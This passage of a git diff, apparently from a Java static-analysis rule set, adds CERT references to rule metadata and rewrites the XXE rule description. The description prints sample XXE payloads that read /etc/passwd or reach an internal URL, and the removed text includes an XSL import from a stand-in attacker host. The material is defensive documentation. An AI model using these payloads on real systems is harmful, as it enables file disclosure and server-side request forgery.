+ "FIO04-J.",
+ "FIO42-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
index b53507a2b9e..5d2efdcb14b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2111",
"sqKey": "S2111",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
index 9215cadedcc..6f699f76816 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2151",
"sqKey": "S2151",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MET12-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
index 898e7975c1f..5fa4ef20a2e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2159",
"sqKey": "S2159",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
index 092502560cf..aa355c64b14 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2162",
"sqKey": "S2162",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MET08-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
index 553741e0e39..122d84b00fb 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2164",
"sqKey": "S2164",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FLP02-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
index 6de493e1daa..b754f673bbf 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
609
+ ],
+ "CERT": [
+ "LCK10-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
index b7f2c68f33f..a9629e0266b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2175",
"sqKey": "S2175",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP04-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
index 7ff1ccee240..ea2a6346035 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2178",
"sqKey": "S2178",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP46-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
index 8b7c69aa367..88b62dc6a8d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
@@ -19,6 +19,10 @@
"securityStandards": {
"CWE": [
190
+ ],
+ "CERT": [
+ "NUM50-J.",
+ "INT18-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
index 20c7eb00fef..7f7f60a60c0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2189",
"sqKey": "S2189",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
index 6556bff5322..40b9ca2fe05 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2197",
"sqKey": "S2197",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM51-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
index cab8614227a..b360fb09d36 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2201",
"sqKey": "S2201",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP12-C.",
+ "EXP00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
index f3d40c01923..f4a8974920f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
index 9dc57d5bdbd..a50a1636853 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2226",
"sqKey": "S2226",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC11-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
index 32812720968..78b1c50b3bd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
@@ -40,10 +40,15 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator
(PRNG)
- MITRE, CWE-330 - Use of Insufficiently Random Values
- MITRE, CWE-326 - Inadequate Encryption Strength
+ - MITRE, CWE-1241 - Use of Predictable Algorithm in Random Number Generator
- CERT, MSC02-J. - Generate strong random numbers
- CERT, MSC30-C. - Do not use the rand() function for generating pseudorandom numbers
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
index e84e6feff4c..ec3758ffd95 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
@@ -8,8 +8,8 @@
},
"tags": [
"cwe",
- "cert",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2245",
@@ -19,10 +19,22 @@
"CWE": [
338,
330,
- 326
+ 326,
+ 1241
],
"OWASP": [
"A3"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-6"
+ ],
+ "CERT": [
+ "MSC02-J.",
+ "MSC30-C.",
+ "MSC50-CPP."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
index 7d102157ee2..037077b6a08 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2251",
"sqKey": "S2251",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC54-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
index 9c3dfcc553d..473bf14c42a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
@@ -17,6 +17,10 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP34-C.",
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
index 6c917c266ac..fd05dcd7593 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2274",
"sqKey": "S2274",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "THI03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
index 56098a46437..13031b65506 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2275",
"sqKey": "S2275",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FIO47-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
index 39e7b87f53a..7e64c886a3d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2276",
"sqKey": "S2276",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK09-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
index 4717682046e..3875b5728b0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2326",
"sqKey": "S2326",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-CPP."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
index 1e1e7bcf75a..759ea4d92a2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
@@ -19,6 +19,11 @@
"CWE": [
375,
374
+ ],
+ "CERT": [
+ "OBJ05-J.",
+ "OBJ06-J.",
+ "OBJ13-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
index 73bb776817c..d0dd1f1ac45 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
@@ -19,6 +19,10 @@
"CWE": [
607,
582
+ ],
+ "CERT": [
+ "OBJ01-J.",
+ "OBJ13-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
index 4927cd6d9df..c31ae672f5b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2390",
"sqKey": "S2390",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
index 25a1230ee38..5ea6777fb6b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2442",
"sqKey": "S2442",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
index 237d5623790..e98fbfd8d58 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
@@ -19,6 +19,9 @@
"CWE": [
412,
413
+ ],
+ "CERT": [
+ "LCK00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
index 703a9438854..7c9169904c9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2446",
"sqKey": "S2446",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "THI02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
index c24fb2d3e4f..e9f94aee62b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
index 7379354766f..e4daf7c9773 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
@@ -22,6 +22,9 @@
489,
571,
570
+ ],
+ "CERT": [
+ "MSC12-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
index 2108d2f12bf..42f48950b7f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
@@ -21,6 +21,9 @@
489,
571,
570
+ ],
+ "CERT": [
+ "MSC12-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
index 5ac03914b06..a6c515b699a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
@@ -23,6 +23,10 @@
],
"OWASP": [
"A5"
+ ],
+ "CERT": [
+ "FIO01-J.",
+ "FIO06-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
index 9efd1ec423b..213b982ec51 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
index b3329c28615..f9375fa7ac2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2674",
"sqKey": "S2674",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "FIO10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
index a4538855ecd..6835616f3f2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
483
+ ],
+ "CERT": [
+ "EXP52-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
index a9fc7ee12aa..d2599ee9f8e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2693",
"sqKey": "S2693",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
index b5f9674a2f3..823aa686b0d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
@@ -1,204 +1,120 @@
-XML specification allows the use of entities that can be internal or external (file system /
-network access …) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.
-Example in this XML document, an external entity read the /etc/passwd file:
+XML standard allows the use of entities, declared in the DOCTYPE of the document, which can be internal or external.
+When parsing the XML file, the content of the external entities is retrieved from an external storage such as the file system or network, which may
+lead, if no restrictions are put in place, to arbitrary file disclosures or server-side request forgery (SSRF) vulnerabilities.
<?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE test [
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
-<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
- <to>&xxe;</to>
- <from>Jani</from>
- <heading>Reminder</heading>
- <body>Don't forget me this weekend!</body>
-</note>
-
-In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
-
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl">
- <xsl:import href="http://www.attacker.com/evil.xsl"/>
- <xsl:include href="http://www.attacker.com/evil.xsl"/>
- <xsl:template match="/">
- &content;
- </xsl:template>
-</xsl:stylesheet>
+<!DOCTYPE person [
+ <!ENTITY file SYSTEM "file:///etc/passwd">
+ <!ENTITY ssrf SYSTEM "https://internal.network/sensitive_information">
+]>
+
+<person>
+ <name>&file;</name>
+ <city>&ssrf;</city>
+ <age>18</age>
+</person>
-It is recommended to disable access to external entities and network access in general.
-To protect Java XML Parsers from XXE attacks these
-properties have been defined since JAXP 1.5:
-
- - ACCESS_EXTERNAL_DTD: should be set to "" when processing XML/XSD/XLS files (it looks for external DOCTYPEs)
- - ACCESS_EXTERNAL_SCHEMA: should be set to "" when processing XML/XSD/XLS files (it looks for external schemalocation ect)
- - ACCESS_EXTERNAL_STYLESHEET should be set to "" when processing XLS file (it looks for external imports, includes ect);
-
-Note that Apache Xerces is still based on JAXP 1.4, therefore one solution is to set to
-false the external-general-entities feature.
-Avoid FEATURE_SECURE_PROCESSING feature to protect from XXE attacks because depending on the implementation:
+It’s recommended to limit resolution of external entities by using one of these solutions:
- - it has no effect to protect the parser from XXE attacks but helps guard against excessive memory consumption from XML processing.
- - or it’s just an obscur shortcut (it could set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to "" but without guarantee).
+ - If DOCTYPE is not necessary, completely disable all DOCTYPE declarations.
+ - If external entities are not necessary, completely disable their declarations.
+ - If external entities are necessary then:
+
+ - Use XML processor features, if available, to authorize only required protocols (eg: https).
+ - And use an entity resolver (and optionally an XML Catalog) to resolve only trusted entities. == Noncompliant Code Example
+
-When setting an entity
-resolver to null (eg: setEntityResolver(null)) the parser will use its own resolution, which is unsafe.
-Noncompliant Code Example
-DocumentBuilderFactory library:
-
-String xml = "xxe.xml";
-DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
-DocumentBuilder builder = df.newDocumentBuilder(); // Noncompliant
-Document document = builder.parse(new InputSource(xml));
-DOMSource domSource = new DOMSource(document);
-
-SAXParserFactory library:
-
-String xml = "xxe.xml";
-SaxHandler handler = new SaxHandler();
-SAXParserFactory factory = SAXParserFactory.newInstance();
-SAXParser parser = factory.newSAXParser(); // Noncompliant
-parser.parse(xml, handler);
-
-XMLInputFactory library:
-
-XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
-XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));
-
-TransformerFactory library:
+For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:
-String xslt = "xxe.xsl";
-String xml = "xxe.xml";
-TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
-Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));
+DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // Noncompliant
-StringWriter writer = new StringWriter();
-transformer.transform(new StreamSource(xml), new StreamResult(writer));
-String result = writer.toString();
-
-SchemaFactory library:
-
-String xsd = "xxe.xsd";
-StreamSource xsdStreamSource = new StreamSource(xsd);
+SAXParserFactory factory = SAXParserFactory.newInstance(); // Noncompliant
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-
-Validator library:
-
-String xsd = "xxe.xsd";
-String xml = "xxe.xml";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-StreamSource xmlStreamSource = new StreamSource(xml);
+XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-Validator validator = schema.newValidator(); // Noncompliant
+TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
-StringWriter writer = new StringWriter();
-validator.validate(xmlStreamSource, new StreamResult(writer));
+SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
-Dom4j library:
+For Dom4j library:
-SAXReader xmlReader = new SAXReader(); // Noncompliant by default
-Document xmlResponse = xmlReader.read(xml);
+SAXReader xmlReader = new SAXReader(); // Noncompliant
-Jdom2 library:
+For Jdom2 library:
-SAXBuilder builder = new SAXBuilder(); // Noncompliant by default
-Document document = builder.build(new File(xml));
+SAXBuilder builder = new SAXBuilder(); // Noncompliant
Compliant Solution
-DocumentBuilderFactory library:
-
-String xml = "xxe.xml";
-DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-DocumentBuilder builder = df.newDocumentBuilder();
-Document document = builder.parse(new InputSource(xml));
-DOMSource domSource = new DOMSource(document);
-
-SAXParserFactory library:
-
-String xml = "xxe.xml";
-SaxHandler handler = new SaxHandler();
-SAXParserFactory factory = SAXParserFactory.newInstance();
-SAXParser parser = factory.newSAXParser();
-parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-parser.parse(xml, handler);
-
-XMLInputFactory library:
-
-XMLInputFactory factory = XMLInputFactory.newInstance();
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-
-XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));
-
-TransformerFactory library:
-
-String xslt = "xxe.xsl";
-String xml = "xxe.xml";
-TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance();
-transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); // Compliant
-// ACCESS_EXTERNAL_SCHEMA not supported in several TransformerFactory implementations
-Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));
+For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:
+
+DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or completely disable external entities declarations:
+factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+// or prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-StringWriter writer = new StringWriter();
-transformer.transform(new StreamSource(xml), new StreamResult(writer));
-String result = writer.toString();
-
